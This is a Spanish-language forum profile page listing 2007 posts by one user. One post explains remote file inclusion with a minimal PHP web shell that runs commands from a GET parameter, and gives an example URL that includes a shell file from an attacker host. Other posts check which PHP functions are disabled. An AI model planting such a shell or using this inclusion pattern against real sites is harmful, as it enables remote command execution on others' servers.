Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - H3xCryp

#1
Scripting / Re: Desarrollo con Perl
31 Diciembre 2007, 15:18 PM
Activeperl

editor: emacs y gedit

;)
#2
Nivel Web / Re: duda con RFI.......
30 Diciembre 2007, 16:13 PM
aver, si te fijas en los codigos de las shells.
te pongo un ejemplo:

Código (php) [Seleccionar]
<?php
$cmd
=$_GET["cmd"];
system($cmd);
?>


la gente que no tiene ni la minima idea de php, usa las shells c99 y todas esas que te lo hacen casi todo automatico, pero no saben como funcionan.

$cmd es una variable global, con $_GET hacemos una peticion.
todo lo que pongamos despues del parametro cmd se ejecutara con system y nos mostrara el resultado del comando.

* ademas de ejecutar con system, se pueden ejecutar comandos con: passthru, system_exec, shell_exec, exec y con eval.

Ejemplo:
http://localhost/shell.php?cmd=ls%20-lia

Por eso cuando en un RFI:
http://vulnerable/principal/main.php?pag_dest=http://atacante/shell.txt?cmd=ls

saludos.
#4
Cita de: The Sixth Halcon en 17 Mayo 2007, 15:34 PM
lo oque puedes hacer es mirar el phpinfo creando una pagina en la que pongas esto


<?
phpinfo();
?>


de ahi te sale toda la informacion de php con todas sus funciones y te dice si estan habilitadas o no

sip, se podria mirar hay pero da lata.
Aqui encontre esta que esta mejor ;)

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

saludos.  ;)
#5
PHP / mirar funciones desavilitadas con php
17 Mayo 2007, 03:37 AM
bueno estaba viendo como mirar las funciones desavilitadas con php con esta funcion:

$disable_funcions=@ini_get('disable_functions');
echo $disable_funcions;


pero no me anda bien.
Alguien sabe otra forma?  ;D